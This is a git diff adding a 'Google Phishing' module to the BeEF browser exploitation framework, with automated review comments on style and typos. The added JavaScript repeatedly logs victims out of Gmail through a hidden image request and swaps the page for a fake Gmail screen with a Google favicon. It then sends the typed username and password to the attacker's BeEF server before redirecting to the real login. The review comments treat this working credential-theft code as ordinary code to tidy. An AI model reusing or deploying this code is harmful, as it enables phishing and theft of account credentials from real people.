diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js new file mode 100644 index 000000000..0926bd59d --- /dev/null +++ b/modules/social_engineering/gmail_phishing/command.js 
@@ -0,0 +1,51 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +function logoutGoogle() { + var img = document.createElement("IMG"); + img.src = "https://mail.google.com/mail/?logout"; + img.height = "1px"; + img.width = "1px"; + img.style.visibility = "hidden"; + document.body.appendChild(img); + //set a new setTimeout to redo the logout + setTimeout('logoutGoogle()', <%= @logout_gmail_interval %>); +} + +beef.execute(function() { + document.title = "Google Mail: Email from Google"; + beef.browser.changeFavicon("https://mail.google.com/favicon.ico"); + logoutGoogle(); + displayPhishingSite(); +}); + +function clickedSubmitButton(){ + var credentials = "Username: "+document.getElementById('Email').value+" Password: "+document.getElementById('Passwd').value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+credentials); + //Timeout needed because otherwise the beef panel doesn't get the credentials in time + setTimeout("redirect()", <%= @wait_seconds_before_redirect %>); +} +function redirect(){ + var theXssUrl = "<%== @xss_hook_url %>"; + if(theXssUrl){ + window.open(theXssUrl); + window.focus(); + } + window.location = "https://accounts.google.com/ServiceLoginAuth"; +} + +function displayPhishingSite(){ + document.body.innerHTML = " Google Mail: Email from Google

Google Mail

A Google approach to email.

Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has:

  • Lots of space

    Over 2757.272164 megabytes (and counting) of free storage.

  • Less spam

    Keep unwanted messages out of your inbox.

  • Mobile access

    Get Google Mail on your mobile phone. Learn more

Take Google Mail to work with Google Apps for Business

Love Google Mail, but looking for a custom email address for your company?
Get business email, calendar, and online docs @your_company.com. Learn more

"; +} diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml new file mode 100644 index 000000000..2ec1d6c6e --- /dev/null +++ b/modules/social_engineering/gmail_phishing/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + gmail_phishing: + enable: true + category: ["Social Engineering"] + name: "Google Phishing" + description: "This plugin uses an image tag to XSRF the logout button of Gmail. Continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (although the URL is NOT the Gmail URL)." + authors: ["floyd @floyd_ch floyd.ch"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb new file mode 100644 index 000000000..dc12c3a33 --- /dev/null +++ b/modules/social_engineering/gmail_phishing/module.rb 
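Review bot: `category: ["Social Engineering"]` is written as a one-element array, whereas the clickjacking and fake_flash_update configs added in the same commit use a plain string, `category: "Social Engineering"`. If the category loader expects a string, the array form presumably renders as a list or fails to group this module with its siblings in the UI; use the string form here. In the description, "eg." should be "e.g.".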
@@ -0,0 +1,50 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Gmail_phishing < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+
+ xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+ logout_gmail_interval = 10000
+ wait_seconds_before_redirect = 1000
+ return [
+ {'name' => 'xss_hook_url',
+ 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.',
+ 'ui_label' => 'XSS hook URI',
+ 'value' => xss_hook_url,
+ 'width' => '300px' }, {
+ 'name' => 'logout_gmail_interval',
+ 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.',
+ 'ui_label' => 'Gmail logout interval (ms)',
+ 'value' => logout_gmail_interval,
+ 'width' => '100px' }, {
+ 'name' => 'wait_seconds_before_redirect',
+ 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeEF gets the credentials in time.',
+ 'ui_label' => 'Redirect delay (ms)',
+ 'value' => wait_seconds_before_redirect,
+ 'width' => '100px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+
+ end
+
+end
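Review bot: `post_execute` writes the reply under the capitalised key `content['Result']`, while the datastore key it reads is lowercase `'result'` and the sibling Cross_site_printing module in this commit saves under `content['result']`; unless the capitalised form is deliberate for display, `content['result'] = @datastore['result'] unless @datastore['result'].nil?` keeps the naming consistent across modules and, like that module, avoids persisting a nil entry. The two option descriptions contain typos that surface in the UI: `loged` → `logged` and `loose` → `lose`. `logout_gmail_interval` and `wait_seconds_before_redirect` are Integer option values whereas the other modules added here pass every `'value'` as a String, so it is worth confirming the UI layer accepts both types; the stray blank line before `end` in `post_execute` and the redundant `return [` are minor style points.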